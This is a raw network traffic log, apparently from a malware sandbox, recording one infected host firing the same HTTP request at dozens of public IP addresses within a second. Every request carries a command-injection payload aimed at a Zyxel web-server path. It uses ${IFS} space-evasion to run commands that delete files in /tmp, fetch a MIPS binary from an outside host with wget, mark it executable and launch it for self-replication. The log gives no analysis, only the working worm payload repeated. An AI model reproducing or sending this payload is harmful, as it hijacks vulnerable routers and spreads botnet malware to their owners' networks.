                                      Jan 14, 2024 15:51:04.723329067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9100192.168.2.144284817.230.53.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723365068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9101192.168.2.1435864137.44.148.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723391056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9102192.168.2.1451240116.135.59.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723439932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9103192.168.2.1456472132.148.165.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723473072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9104192.168.2.1458160204.5.81.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723511934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9105192.168.2.1437406175.176.150.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723536968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9106192.168.2.144379618.158.144.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723582029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9107192.168.2.1436690106.109.46.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723620892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9108192.168.2.1442540146.140.48.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723655939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9109192.168.2.1457248145.84.21.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723701000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9110192.168.2.143834671.88.55.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723736048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9111192.168.2.145162037.196.253.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723778963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9112192.168.2.144329440.46.30.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723809958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9113192.168.2.144614454.66.77.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723845005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9114192.168.2.1457416110.18.193.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723885059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9115192.168.2.1459294209.95.104.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723931074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9116192.168.2.1439046191.109.25.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.723961115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9117192.168.2.144845290.77.203.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724001884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9118192.168.2.1457410176.49.13.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724036932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9119192.168.2.144458051.22.171.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724073887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9120192.168.2.1432980159.168.196.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724108934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9121192.168.2.144696231.242.69.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724173069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9122192.168.2.1460938142.49.202.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724195957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9123192.168.2.143468090.115.222.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724236965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9124192.168.2.1447760136.124.147.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724282026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9125192.168.2.1454154133.193.238.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724299908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9126192.168.2.145099417.207.50.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724359035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9127192.168.2.144338658.206.60.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724395990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9128192.168.2.1442312120.255.176.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724448919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9129192.168.2.1451118125.194.140.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724483967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9130192.168.2.144964835.51.230.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724543095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9131192.168.2.145186488.150.41.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724574089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9132192.168.2.1434074112.68.177.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724607944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9133192.168.2.144677890.115.144.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724654913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9134192.168.2.1460956110.193.16.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724685907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9135192.168.2.1449460108.156.145.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724723101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9136192.168.2.1440008198.204.239.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724777937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9137192.168.2.1445310212.75.144.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724822998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9138192.168.2.1445112219.41.178.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724862099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9139192.168.2.1443026128.138.150.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724910975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9140192.168.2.1441030106.220.143.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.724940062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9141192.168.2.1438156108.67.113.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725008965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9142192.168.2.1453472130.87.174.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725058079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9143192.168.2.146020427.236.78.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725094080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9144192.168.2.1455228166.237.110.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725140095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9145192.168.2.1460272132.254.23.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725178957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9146192.168.2.1458126220.31.12.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725224972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9147192.168.2.1442254133.133.220.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725258112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9148192.168.2.1437272203.247.217.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725320101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9149192.168.2.145588082.128.69.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725353003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9150192.168.2.1440336170.171.240.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725406885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9151192.168.2.1453946120.16.47.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725450039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9152192.168.2.143911698.84.43.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725497007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9153192.168.2.1433736218.215.126.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725528955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9154192.168.2.144490282.115.64.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725583076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9155192.168.2.144645478.67.103.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725610018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9156192.168.2.1440908144.247.127.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725667953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9157192.168.2.1454824160.155.178.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725693941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9158192.168.2.1450296156.165.191.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725719929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9159192.168.2.144127077.116.37.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725773096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9160192.168.2.143286085.106.248.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725821018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9161192.168.2.1456328213.121.168.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725850105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9162192.168.2.1458354159.78.45.126443
                                      TimestampBytes transferredDirectionData
